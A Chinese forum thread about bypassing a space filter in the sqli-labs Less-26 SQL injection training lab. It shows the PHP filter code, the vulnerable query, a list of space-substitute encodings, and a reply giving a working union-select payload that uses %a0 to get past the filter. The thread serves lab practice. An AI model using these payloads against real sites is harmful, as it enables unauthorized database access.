過濾代碼:
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
平臺win7,mysql5.7.10
SQL陳述句:SELECT * FROM users WHERE id='$id' LIMIT 0,1
URL:http://localhost/sqli-labs-master/Less-26/?id=-1%27%09union%09select%091,2,3||%271
過濾方法(都不行):
%09 TAB鍵(水平)
%0a 新建一行
%0c 新的一頁
%0d return功能
%0b TAB鍵(垂直)
%a0 空格
/**/
+
()
以上過濾方法都試過了還是不行,沒有效果,如圖
在線等。。
uj5u.com熱心網友回復:
沒看懂你的問題是什么。。。uj5u.com熱心網友回復:
就是如何繞過空格過濾,以上的方法我都試過,都沒效果
uj5u.com熱心網友回復:
sql注入?
uj5u.com熱心網友回復:
使用寬位元組繞過,用%a0代替空格注入uj5u.com熱心網友回復:
比如注入: id=0%27union%a0select%a01,2,3%a0%26%26%a0%271%27=%271uj5u.com熱心網友回復:
%a0可以繞過的轉載請註明出處,本文鏈接:https://www.uj5u.com/shujuku/88015.html
標籤:MySQL